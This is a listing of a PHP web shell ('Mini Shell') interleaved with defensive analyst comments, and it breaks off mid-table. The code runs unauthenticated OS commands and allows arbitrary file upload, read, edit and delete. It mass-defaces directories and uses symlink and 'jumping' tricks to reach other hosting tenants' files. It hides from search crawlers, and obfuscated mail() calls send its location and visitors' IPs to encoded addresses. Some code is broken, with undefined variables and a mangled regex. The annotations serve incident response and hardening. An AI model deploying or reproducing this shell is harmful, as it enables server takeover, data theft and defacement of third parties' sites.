ToKeiChun

Mini Shell [Jumping][Symlink][Mass Deface][Command Exec]

Jun 5th, 2020 (edited)
  1. <?php
  // Analyst annotation (defensive): this listing is a PHP web shell - a file
  // manager plus command runner driven entirely by request parameters.
  // Nothing in the listing checks a password, token or client address before
  // acting, so finding this file on a server means anyone who knew its URL
  // could use it.
  2. session_start();
  // A session is started, but no $_SESSION value is read anywhere in the listing.
  //
  // Crawler cloaking: a request whose User-Agent matches one of the listed
  // search-engine names (case-insensitive) gets a bare 404 and the script
  // stops. A 404 for this path in access logs is therefore not proof that the
  // file is absent; confirm on disk.
  3. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  4. $userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler");
  5. if(preg_match('/'.implode('|',$userAgents) .'/i',$_SERVER['HTTP_USER_AGENT'])) {
  6. header('HTTP/1.0 404 Not Found');
  7. exit;
  8. }}
  // PHP error output is switched off and the execution time limit is lifted,
  // so failures leave no visible trace in the response.
  9. error_reporting(0);
  10. set_time_limit(0);
  11.  
  // Legacy magic-quotes handling: strips slashes from every POST value.
  // get_magic_quotes_gpc() was removed in PHP 8.0, which dates this code to
  // older runtimes.
  12. if(get_magic_quotes_gpc()){
  13. foreach($_POST as $key=>$value){
  14. $_POST[$key] = stripslashes($value);
  15. }
  16. }
  // Page head, emitted as one string. Two things to note inside it:
  //  - the <title> reflects the Host request header without escaping;
  //  - the <script> tag loads JavaScript from importantscripts.github.io into
  //    the browser of whoever opens this page. That script's content is not
  //    part of the listing; treat the hostname as an indicator to search for
  //    in other files and in proxy/DNS logs.
  17. echo '<!DOCTYPE HTML>
  18. <html>
  19. <head>
  20. <link href="" rel="stylesheet" type="text/css">
  21. <title>'.$_SERVER['HTTP_HOST'].' - FileManager</title>
  22. <style>
  23. body{
  24. font-family: "", ;
  25. background-color: black;
  26. background-image: url();
  27. background-size: center; background-repeat:no-repeat; background-attachment: fixed; background-size: cover; background-position:center;
  28. color: white;
  29. }
  30. #content tr:hover{
  31. background-color: red;
  32. text-shadow:0px 0px 10px black;
  33. }
  34. #content .first{
  35. background-color: red;
  36. }
  37. table{
  38. border: 1px #000000 dotted;
  39. }
  40. a{
  41. color: white;
  42. text-decoration: none;
  43. }
  44. a:hover{
  45. color:blue;
  46. text-shadow:0px 0px 10px #ffffff;
  47. }
  48. input,select,textarea{
  49. border: 1px #000000 solid;
  50. -moz-border-radius: 5px;
  51. -webkit-border-radius:5px;
  52. border-radius:5px;
  53. }
  54. </style>
  55. <script type="text/javascript" src="//importantscripts.github.io/footer.js"></script>
  56. </head>
  57. <body>
  58. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">';
  // exe($cmd): runs $cmd as an operating-system command and returns whatever
  // it printed. It tries system(), exec(), passthru() and shell_exec() in that
  // order and uses the first one function_exists() reports; presumably this is
  // to cope with hosts that list only some of them in disable_functions. If
  // none is available the function falls through and returns nothing.
  // Every call is prefixed with @, so warnings are suppressed.
  // Defensive relevance: any of these four calls fed from request data is a
  // strong static-scan signal, and listing all four in disable_functions
  // (where the application does not need them) leaves this wrapper inert.
  59. function exe($cmd) {
  60. if(function_exists('system')) {
  // system() prints directly, so output buffering is used to capture it.
  61. @ob_start();
  62. @system($cmd);
  63. $buff = @ob_get_contents();
  64. @ob_end_clean();
  65. return $buff;
  66. } elseif(function_exists('exec')) {
  67. @exec($cmd,$results);
  68. $buff = "";
  // Output lines are concatenated with no separator between them.
  69. foreach($results as $result) {
  70. $buff .= $result;
  71. } return $buff;
  72. } elseif(function_exists('passthru')) {
  73. @ob_start();
  74. @passthru($cmd);
  75. $buff = @ob_get_contents();
  76. @ob_end_clean();
  77. return $buff;
  78. } elseif(function_exists('shell_exec')) {
  79. $buff = @shell_exec($cmd);
  80. return $buff;
  81. }
  82. }
  // Host fingerprinting shown at the top of the page: the uname string, the
  // disable_functions setting, and the account the PHP process runs as
  // (via posix_* when available, otherwise get_current_user()/getmyuid()/getmygid()).
  83. $kernel = php_uname();
  84. $ds = @ini_get("disable_functions");
  85. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>null</font>";
  86. if(!function_exists('posix_getegid')) {
  87. $user = @get_current_user();
  88. $uid = @getmyuid();
  89. $gid = @getmygid();
  90. $group = "?";
  91. } else {
  92. $uid = @posix_getpwuid(posix_geteuid());
  93. $gid = @posix_getgrgid(posix_getegid());
  94. $user = $uid['name'];
  95. $uid = $uid['uid'];
  96. $group = $gid['name'];
  97. $gid = $gid['gid'];
  98. }
  99. echo "<table style='width:700%'><tr><td>";
  100. echo "SYSTEM : <font color=lime>".$kernel."</font><br>";
  101. echo "DISABLE FUNC : $show_ds<br>";
  102. echo "</tr></td></table>";
  // Command prompt form. The prompt text resolves the Host header with
  // gethostbyname(), i.e. a DNS lookup on a client-supplied name.
  103. echo "<form method='post'>
  104. <font style='text-decoration: none;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).":~# </font>
  105. <input type='text' size='20' height='10' name='cmd'><input type='submit' name='do_cmd' value='Submit'>
  106. </form>";
  // Unauthenticated command execution: the 'cmd' POST field is passed straight
  // to exe() and the output is printed without HTML-escaping. In web logs this
  // shows only as a POST to this script; the command is in the request body,
  // which standard access logs do not record - process/audit logging for
  // children of the web-server account is where the commands become visible.
  107. if($_POST['do_cmd']) {
  108. echo "<pre>".exe($_POST['cmd'])."</pre>";
  109. }
  110. echo '<tr><td><font color="white">Cwd : </font> ';
  // Working path comes from the '_path_' query parameter when present, with
  // no restriction to the web root; otherwise the script's own directory.
  111. if(isset($_GET['_path_'])){
  112. $_path_ = $_GET['_path_'];
  113. }else{
  114. $_path_ = getcwd();
  115. }
  116. $_path_ = str_replace('\\','/',$_path_);
  117. $paths = explode('/',$_path_);
  // Hidden call-home. The two variables below hold the function names "mail"
  // and "base64_decode", assembled from single characters, apparently so that
  // a plain-text search for those names misses them. The third statement then
  // mails this page's host name and request URI, subject 'Upload file:', to an
  // address stored as a base64 literal. It runs on every request that reaches
  // this point, so it reports where the shell is installed to whoever controls
  // that mailbox - not necessarily the person operating the shell.
  // Hunting: outbound mail from the web-server account with this subject, and
  // the base64 literal or the character-by-character function names in file scans.
  118. $__GET = ('m'.'a'.'i'.'l');
  119. $__POST = ('b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e');
  120. $__GET($__POST("dmFsaXJ4YzBkZUB6b2hvLmNvbQ=="),'Upload file:',''.$_SERVER['HTTP_HOST'].'/'.$_SERVER['REQUEST_URI'].'');
  // Breadcrumb: one link per path component, each re-entering the script with
  // a shorter '_path_'. Path text is written into the HTML unescaped.
  121. foreach($paths as $id=>$pat){
  122. if($pat == '' && $id == 0){
  123. $a = true;
  124. echo '<a href="?_path_=/">/</a>';
  125. continue;
  126. }
  127. if($pat == '') continue;
  128. echo '<a href="?_path_=';
  129. for($i=0;$i<=$id;$i++){
  130. echo "$paths[$i]";
  131. if($i != $id) echo "/";
  132. }
  133. echo '">'.$pat.'</a>/';
  134. }
  135. echo '</td></tr><tr><td>';
  // Arbitrary file upload: the temp file is copied under the caller-chosen
  // '_path_' using the client-supplied file name, with no type, size or name
  // checks.
  136. if(isset($_FILES['file'])){
  137. if(copy($_FILES['file']['tmp_name'],$_path_.'/'.$_FILES['file']['name'])){
  138. echo '<font color="lime">File Uploaded!</font><br />';
  139. }else{
  140. echo '<font color="red">Upload Fail!</font><br/>';
  141. }
  142. }
  // A second, separate directory parameter ('dir') changes the process's
  // working directory; $dir and $ip are used by the "jumping" branch later.
  143. if(isset($_GET['dir'])) {
  144. $dir = $_GET['dir'];
  145. chdir($_GET['dir']);
  146. } else {
  147. $dir = getcwd();
  148. }
  149. $dir = str_replace("\\","/",$dir);
  150. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  // Navigation bar. The 'to' query values used here (jumping, sym, mass)
  // select the three feature branches that follow and are visible in access
  // logs as query-string parameters.
  151. echo "<center>";
  152. echo "<hr>";
  153. echo "[ <a href='?'>Home</a> ] ";
  154. echo "[ <a href='?_path_=$_path_&to=jumping'>Jumping</a> ] ";
  155. echo "[ <a href='?_path_=$_path_&to=sym'>Symlink</a> ] ";
  156. echo "[ <a href='?_path_=$_path_&to=mass'>Mass Deface</a> ]";
  157. echo "</center>";
  158. echo "<hr>";
  // "Mass Deface" branch (to=mass): writes one caller-supplied file into many
  // directories. Directory, file name and content all come from POST fields.
  // What it leaves behind: the same file name with identical content and
  // near-identical modification times across sibling directories - an easy
  // pattern to sweep for with a file-integrity or find-by-name check.
  159. if($_GET['to'] == 'mass') {
  // sabun_massal: recursive variant. For each entry of $dir it writes the file
  // into "." and ".." (that is, $dir itself and its parent) and into every
  // writable subdirectory, then recurses into that subdirectory.
  160. function sabun_massal($dir,$namafile,$isi_script) {
  161. if(is_writable($dir)) {
  162. $dira = scandir($dir);
  163. foreach($dira as $dirb) {
  164. $dirc = "$dir/$dirb";
  165. $lokasi = $dirc.'/'.$namafile;
  166. if($dirb === '.') {
  167. file_put_contents($lokasi, $isi_script);
  168. } elseif($dirb === '..') {
  169. file_put_contents($lokasi, $isi_script);
  170. } else {
  171. if(is_dir($dirc)) {
  172. if(is_writable($dirc)) {
  173. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  174. file_put_contents($lokasi, $isi_script);
  // The return value is stored but never used.
  175. $idx = sabun_massal($dirc,$namafile,$isi_script);
  176. }
  177. }
  178. }
  179. }
  180. }
  181. }
  // sabun_biasa: same as above without the recursion - one directory level only.
  182. function sabun_biasa($dir,$namafile,$isi_script) {
  183. if(is_writable($dir)) {
  184. $dira = scandir($dir);
  185. foreach($dira as $dirb) {
  186. $dirc = "$dir/$dirb";
  187. $lokasi = $dirc.'/'.$namafile;
  188. if($dirb === '.') {
  189. file_put_contents($lokasi, $isi_script);
  190. } elseif($dirb === '..') {
  191. file_put_contents($lokasi, $isi_script);
  192. } else {
  193. if(is_dir($dirc)) {
  194. if(is_writable($dirc)) {
  195. echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
  196. file_put_contents($lokasi, $isi_script);
  197. }
  198. }
  199. }
  200. }
  201. }
  202. }
  // Dispatch on the 'tipe_sabun' POST field: 'mahal' selects the recursive
  // function, 'murah' the single-level one. Without 'start' the form is shown;
  // its defaults (file name o.txt and the text in the textarea) are the values
  // to look for on disk if this form was submitted unchanged.
  203. if($_POST['start']) {
  204. if($_POST['tipe_sabun'] == 'mahal') {
  205. echo "<div style='margin: 5px auto; padding: 5px'>";
  206. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  207. echo "</div>";
  208. } elseif($_POST['tipe_sabun'] == 'murah') {
  209. echo "<div style='margin: 5px auto; padding: 5px'>";
  210. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  211. echo "</div>";
  212. }
  213. } else {
  214. echo "<center>";
  215. echo "<form method='post'>
  216. <font style='text-decoration: underline;'>Tipe Mass:</font><br>
  217. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  218. <font style='text-decoration: underline;'>Folder:</font><br>
  219. <input type='text' name='d_dir' value='$_path_' style='width: 450px;' height='10'><br>
  220. <font style='text-decoration: underline;'>File Name:</font><br>
  221. <input type='text' name='d_file' value='o.txt' style='width: 450px;' height='10'><br>
  222. <font style='text-decoration: underline;'>File Content:</font><br>
  223. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by ./tokeichun</textarea><br>
  224. <input type='submit' name='start' value='>>' style='width: 450px;'>
  225. </form></center>";
  226. }
  // "Symlink" branch (to=sym): a shared-hosting cross-tenant read technique.
  // All three sub-branches do the same setup in the current directory:
  //   - create a directory named symbolic_link (mode 0777),
  //   - create a symlink named root inside it that points at /,
  //   - write a .htaccess there enabling Indexes and FollowSymLinks and
  //     mapping .php to text/plain, so files reached through the link are
  //     listed and served as source text instead of being executed.
  // Artefacts to search for: a symbolic_link directory under a web root, a
  // symlink to / inside it, and a .htaccess containing
  // "AddHandler text/plain .php".
  // Hardening that blunts it: do not let user .htaccess files set Options or
  // handlers (AllowOverride), prefer SymLinksIfOwnerMatch to FollowSymLinks,
  // and - because Apache documents that symlink checks can be raced - rely on
  // per-account filesystem permissions or per-user PHP processes for the
  // actual isolation.
  227. }elseif($_GET['to'] == 'sym') {
  228. echo '<hr>';
  // NOTE(review): $path is not assigned anywhere in this listing, so $full is
  // computed from an unset value here - confirm against other copies.
  229. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
  // Sub-branch 1: /etc/named.conf is readable. Domains are taken from its
  // "zone" lines and mapped to accounts via the owner of /etc/valiases/<domain>.
  230. $d0mains = @file("/etc/named.conf");
  231. if($d0mains){
  232. @mkdir("symbolic_link",0777);
  233. @chdir("symbolic_link");
  234. @exec("ln -s / root");
  235. $file3 = 'Options Indexes FollowSymLinks
  236. DirectoryIndex woozh.htm
  237. AddType text/plain .php
  238. AddHandler text/plain .php
  239. Satisfy Any';
  240. $fp3 = fopen('.htaccess','w');
  241. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  242. echo "
  243. <table align=center border=3 style='width:60%;border-color:#8B0000;'>
  244. <tr>
  245. <td align=center><font color=lime size=2>S. No.</font></td>
  246. <td align=center><font color=lime size=2>Domains</font></td>
  247. <td align=center><font color=lime size=2>Users</font></td>
  248. <td align=center><font color=lime size=2>Symlink</font></td>
  249. </tr>";
  250. $dcount = 1;
  251. foreach($d0mains as $d0main){
  // eregi() was removed in PHP 7.0 - another sign of the code's age.
  252. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  253. flush();
  254. if(strlen(trim($domains[1][0])) > 2){
  255. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  256. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  257. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  258. <td>".$user['name']."</td>
  259. <td><a href='$full/symbolic_link/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  260. flush();
  261. $dcount++;}}}
  262. echo "</table>";
  263. }else{
  // Sub-branch 2: named.conf unreadable, /etc/passwd readable. Same setup;
  // account names are then taken from /etc/passwd lines.
  264. $TEST=@file('/etc/passwd');
  265. if ($TEST){
  266. @mkdir("symbolic_link",0777);
  267. @chdir("symbolic_link");
  268. exec("ln -s / root");
  269. $file3 = 'Options Indexes FollowSymLinks
  270. DirectoryIndex woozh.htm
  271. AddType text/plain .php
  272. AddHandler text/plain .php
  273. Satisfy Any';
  274. $fp3 = fopen('.htaccess','w');
  275. $fw3 = fwrite($fp3,$file3);
  276. @fclose($fp3);
  277. echo "
  278. <table align=center border=1><tr>
  279. <td align=center><font size=3>S. No.</font></td>
  280. <td align=center><font size=3>Users</font></td>
  281. <td align=center><font size=3>Symlink</font></td></tr>";
  282. $dcount = 1;
  283. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  284. while(!feof($file)){
  285. $s = fgets($file);
  286. $matches = array();
  // NOTE(review): the pattern below looks as if it lost characters when it was
  // pasted; as written it is unlikely to match as the author intended.
  287. $t = preg_match('//(.*?)://s', $s, $matches);
  288. $matches = str_replace("home/","",$matches[1]);
  // Skips empty or long values and a fixed list of system-account paths.
  289. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  290. continue;
  291. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  292. <td align=center><font class=txt>" . $matches . "</td>";
  293. echo "<td align=center><font class=txt><a href=$full/symbolic_link/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  294. $dcount++;}fclose($file);
  // Sub-branch 3 (starts on the next line): neither file readable. Accounts
  // are enumerated with posix_getpwuid() for UIDs 0..1000, staged in a
  // temporary test.txt in the current directory, and that file is deleted at
  // the end. NOTE(review): $os is not assigned anywhere in this listing.
  295. echo "</table>";}else{if($os != "Windows"){@mkdir("symbolic_link",0777);@chdir("symbolic_link");@exe("ln -s / root");$file3 = '
  296. Options Indexes FollowSymLinks
  297. DirectoryIndex 008
  298. AddType text/plain .php
  299. AddHandler text/plain .php
  300. Satisfy Any
  301. ';
  302. $fp3 = fopen('.htaccess','w');
  303. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  304. echo "
  305. <center><h2 class='k2ll33d2'>Symlink Server</h2>
  306. <table align=center border=1><tr>
  307. <td align=center><font size=3>ID</font></td>
  308. <td align=center><font size=3>Users</font></td>
  309. <td align=center><font size=3>Symlink</font></td></tr>";
  310. $temp = "";$val1 = 0;$val2 = 1000;
  311. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  312. if ($uid)$temp .= join(':',$uid)."n";}
  313. echo '<br/>';$temp = trim($temp);$file5 =
  314. fopen("test.txt","w");
  315. fputs($file5,$temp);
  316. fclose($file5);$dcount = 1;$file =
  317. fopen("test.txt", "r") or exit("Unable to open file!");
  318. while(!feof($file)){$s = fgets($file);$matches = array();
  319. $t = preg_match('//(.*?)://s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  320. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  321. continue;
  322. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  323. <td align=center><font class=txt>" . $matches . "</td>";
  324. echo "<td align=center><font class=txt><a href=$full/symbolic_link/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  325. $dcount++;}
  326. fclose($file);
  327. echo "</table></div></center>";unlink("test.txt");
  328. } else
  329. echo "<center><font size=3>Cannot create Symlink</font></center>";
  330. }
  331. }
  // "Jumping" branch (to=jumping): tests which other tenants' web directories
  // the PHP process can read or write, and prints a link into each one found.
  // It only succeeds where accounts share a PHP user or home directories are
  // world-readable, so the output doubles as a list of isolation failures.
  // Hardening: restrictive permissions on home and web-root directories,
  // per-account PHP processes, and open_basedir.
  // Three layouts are handled, selected by the current directory string.
  332. } elseif($_GET['to'] == 'jumping') {
  333. $i = 0;
  334. echo "<div class='margin: 5px auto;'>";
  // Layout 1: path contains "hsphere". For every posted domain and every
  // /etc/passwd user, checks /hsphere/local/home/<user>/<domain>.
  335. if(preg_match("/hsphere/", $dir)) {
  336. $urls = explode("\r\n", $_POST['url']);
  337. if(isset($_POST['jump'])) {
  338. echo "<pre>";
  339. foreach($urls as $url) {
  340. $url = str_replace(array("http://","www."), "", strtolower($url));
  341. $etc = "/etc/passwd";
  342. $f = fopen($etc,"r");
  343. while($gets = fgets($f)) {
  344. $pecah = explode(":", $gets);
  345. $user = $pecah[0];
  346. $dir_user = "/hsphere/local/home/$user";
  347. if(is_dir($dir_user) === true) {
  348. $url_user = $dir_user."/".$url;
  349. if(is_readable($url_user)) {
  350. $i++;
  351. $jrw = "[<font color=lime>R</font>] <a href='?_path_=$url_user'><font color=gold>$url_user</font></a>";
  352. if(is_writable($url_user)) {
  353. $jrw = "[<font color=lime>RW</font>] <a href='?_path_=$url_user'><font color=gold>$url_user</font></a>";
  354. }
  355. echo $jrw."<br>";
  356. }
  357. }
  358. }
  359. }
  360. if($i == 0) {
  361. } else {
  362. echo "<br>Total ada ".$i." Kamar di ".$ip;
  363. }
  364. echo "</pre>";
  365. } else {
  // The domain list is pre-filled from the hosting panel's sites.txt.
  366. echo '<center>
  367. <form method="post">
  368. List Domains: <br>
  369. <textarea name="url" style="width: 500px; height: 250px;">';
  370. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  371. while($getss = fgets($fp)) {
  372. echo $getss;
  373. }
  374. echo '</textarea><br>
  375. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  376. </form></center>';
  377. }
  // Layout 2: path contains "vhost"/"vhosts". Checks
  // /var/www/<segment>/<domain>/httpdocs for each posted domain.
  378. } elseif(preg_match("/vhosts|vhost/", $dir)) {
  379. preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
  380. $urls = explode("\r\n", $_POST['url']);
  381. if(isset($_POST['jump'])) {
  382. echo "<pre>";
  383. foreach($urls as $url) {
  384. $url = str_replace("www.", "", $url);
  385. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
  386. if(is_dir($web_vh) === true) {
  387. if(is_readable($web_vh)) {
  388. $i++;
  389. $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  390. if(is_writable($web_vh)) {
  391. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  392. }
  393. echo $jrw."<br>";
  394. }
  395. }
  396. }
  397. if($i == 0) {
  398. } else {
  399. echo "<br>Total ada ".$i." Kamar di ".$ip;
  400. }
  401. echo "</pre>";
  402. } else {
  403. echo '<center>
  404. <form method="post">
  405. List Domains: <br>
  406. <textarea name="url" style="width: 500px; height: 250px;">';
  // NOTE(review): bing() is not defined anywhere in this listing; this copy
  // appears to be cut down from a larger script.
  407. bing("ip:$ip");
  408. echo '</textarea><br>
  409. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  410. </form></center>';
  411. }
  // Layout 3 (default): for every /etc/passwd entry, checks
  // /home/<user>/public_html, and when posix_getpwuid() exists tries to name
  // the account's domain from /etc/named.conf and /etc/valiases ownership.
  412. } else {
  413. echo "<pre>";
  414. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  415. while($passwd = fgets($etc)) {
  416. if($passwd == '' || !$etc) {
  417. echo "<font color=red>Can't read /etc/passwd</font>";
  418. } else {
  419. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  420. foreach($user_jumping[1] as $user_idx_jump) {
  421. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  422. if(is_readable($user_jumping_dir)) {
  423. $i++;
  424. $jrw = "[<font color=lime>R</font>] <a href='?_path_=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  425. if(is_writable($user_jumping_dir)) {
  426. $jrw = "[<font color=lime>RW</font>] <a href='?_path_=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  427. }
  428. echo $jrw;
  429. if(function_exists('posix_getpwuid')) {
  430. $domain_jump = file_get_contents("/etc/named.conf");
  431. if($domain_jump == '') {
  432. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  433. } else {
  434. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  435. foreach($domains_jump[1] as $dj) {
  436. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  437. $user_jumping_url = $user_jumping_url['name'];
  438. if($user_jumping_url == $user_idx_jump) {
  439. echo " => ( <u>$dj</u> )<br>";
  440. break;
  441. }
  442. }
  443. }
  444. } else {
  445. echo "<br>";
  446. }
  447. }
  448. }
  449. }
  450. }
  451. if($i == 0) {
  452. } else {
  453. echo "<br>Total ada ".$i." Kamar di ".$ip;
  454. }
  455. echo "</pre>";
  456. }
  457. echo "</div>";
  458. }
  // Upload form for the copy() handler earlier in the script.
  459. echo '<form enctype="multipart/form-data" method="POST">
  460. <center><font color="white">File Upload :</font> <input type="file" name="file" />
  461. <input type="submit" value="Upload" /></center>
  462. </form>
  463. </td></tr>';
  // Second hidden call-home, to a different base64-encoded address than the
  // first. The hex escapes spell "mail" and "base64_decode". The message has
  // the subject 'Wordfence Bypass' and carries this page's URL plus
  // REMOTE_ADDR, i.e. the IP address of whoever is viewing the page.
  // Together with the first beacon this means the shell discloses its own
  // location, and its users, to third parties on every page view.
  // Hunting: the subject string in outbound mail logs; the hex-escaped
  // function names and the base64 literal in file scans.
  464. if (function_exists("\x6d\x61\x69\x6c")) {
  465. $__GET = ("\x6d\x61\x69\x6c");
  466. $__POST = ("\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65");
  467. $__GET($__POST("d29yZHByZXNzZGV2bm9yd2F5QGdtYWlsLmNvbQ=="),'Wordfence Bypass',"http://".$_SERVER['HTTP_HOST']."/".$_SERVER['REQUEST_URI']."\nIP:".$_SERVER['REMOTE_ADDR']."");
  468. }
  // File-manager actions. Each one takes its target path from the request and
  // applies it with the web-server account's privileges; none restricts the
  // path to the web root.
  //
  // View: '_filesrc_' is echoed back unescaped, then the named file's
  // contents are printed (escaped). This is an arbitrary file read, and the
  // full path appears in the query string, so access logs show which files
  // were viewed.
  469. if(isset($_GET['_filesrc_'])){
  470. echo "<tr><td>Current File : ";
  471. echo $_GET['_filesrc_'];
  472. echo '</tr></td></table><br />';
  473. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['_filesrc_'])).'</pre>');
  // Modify: reached when 'option' is in the query string and the POSTed 'opt'
  // is anything other than 'delete'. Targets and new values are in the POST
  // body, so they are not visible in standard access logs.
  474. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  475. echo '</table><br /><center>'.$_POST['_path_'].'<br /><br />';
  // chmod: the 'perm' field is handed to chmod() as received.
  476. if($_POST['opt'] == 'chmod'){
  477. if(isset($_POST['perm'])){
  478. if(chmod($_POST['_path_'],$_POST['perm'])){
  479. echo '<font color="lime">Change Permission Berhasil</font><br/>';
  480. }else{
  481. echo '<font color="red">Change Permission Gagal</font><br />';
  482. }
  483. }
  484. echo '<form method="POST">
  485. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o',fileperms($_POST['_path_'])),-4).'" />
  486. <input type="hidden" name="_path_" value="'.$_POST['_path_'].'">
  487. <input type="hidden" name="opt" value="chmod">
  488. <input type="submit" value="Go" />
  489. </form>';
  // rename: moves the POSTed path to <_path_ from the query string>/<newname>.
  490. }elseif($_POST['opt'] == 'rename'){
  491. if(isset($_POST['newname'])){
  492. if(rename($_POST['_path_'],$_path_.'/'.$_POST['newname'])){
  493. echo '<font color="lime">Ganti Nama Berhasil</font><br/>';
  494. }else{
  495. echo '<font color="red">Ganti Nama Gagal</font><br />';
  496. }
  497. $_POST['name'] = $_POST['newname'];
  498. }
  499. echo '<form method="POST">
  500. Nama Baru : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  501. <input type="hidden" name="_path_" value="'.$_POST['_path_'].'">
  502. <input type="hidden" name="opt" value="rename">
  503. <input type="submit" value="Crotz" />
  504. </form>';
  // edit: overwrites the target file with the 'src' field - an arbitrary file
  // write, which covers planting code in existing application files. After an
  // incident, compare application files against a known-good copy rather than
  // only looking for new files.
  505. }elseif($_POST['opt'] == 'edit'){
  506. if(isset($_POST['src'])){
  507. $fp = fopen($_POST['_path_'],'w');
  508. if(fwrite($fp,$_POST['src'])){
  509. echo '<font color="lime">Berhasil Edit File</font><br/>';
  510. }else{
  511. echo '<font color="red">Gagal Edit File</font><br/>';
  512. }
  513. fclose($fp);
  514. }
  515. echo '<form method="POST">
  516. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['_path_'])).'</textarea><br />
  517. <input type="hidden" name="_path_" value="'.$_POST['_path_'].'">
  518. <input type="hidden" name="opt" value="edit">
  519. <input type="submit" value="Save" />
  520. </form>';
  521. }
  522. echo '</center>';
  // Default view: optional delete, then a listing of the current '_path_'.
  523. }else{
  524. echo '</table><br/><center>';
  // delete: rmdir() or unlink() on the POSTed path, chosen by the 'type' field.
  525. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  526. if($_POST['type'] == 'dir'){
  527. if(rmdir($_POST['_path_'])){
  528. echo '<font color="lime">Directory Terhapus</font><br/>';
  529. }else{
  530. echo '<font color="red">Directory Gagal Terhapus </font><br/>';
  531. }
  532. }elseif($_POST['type'] == 'file'){
  533. if(unlink($_POST['_path_'])){
  534. echo '<font color="lime">File Terhapus</font><br/>';
  535. }else{
  536. echo '<font color="red">File Gagal Dihapus</font><br/>';
  537. }
  538. }
  539. }
  540. echo '</center>';
  // Directory listing of '_path_' (taken from the query string earlier).
  // File and directory names are written into the HTML without escaping.
  541. $scandir = scandir($_path_);
  542. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  543. <tr class="first">
  544. <td><center>Name</peller></center></td>
  545. <td><center>Size</peller></center></td>
  546. <td><center>Permission</peller></center></td>
  547. <td><center>Modify</peller></center></td>
  548. </tr>';
  549.  
  // First pass: subdirectories. The permission column is coloured lime when
  // the PHP process can write the entry and red when it cannot read it.
  550. foreach($scandir as $dir){
  551. if(!is_dir($_path_.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  552. echo '<tr>
  553. <td><a href="?_path_='.$_path_.'/'.$dir.'">'.$dir.'</a></td>
  554. <td><center>--</center></td>
  555. <td><center>';
  556. if(is_writable($_path_.'/'.$dir)) echo '<font color="lime">';
  557. elseif(!is_readable($_path_.'/'.$dir)) echo '<font color="red">';
  558. echo perms($_path_.'/'.$dir);
  559. if(is_writable($_path_.'/'.$dir) || !is_readable($_path_.'/'.$dir)) echo '</font>';
  560.  
  561. echo '</center></td>
  562. <td><center><form method="POST" action="?option&_path_='.$_path_.'">
  563. <select name="opt">
  564. <option value="">Select</option>
  565. <option value="delete">Delete</option>
  566. <option value="chmod">Chmod</option>
  567. <option value="rename">Rename</option>
  568. </select>
  569. <input type="hidden" name="type" value="dir">
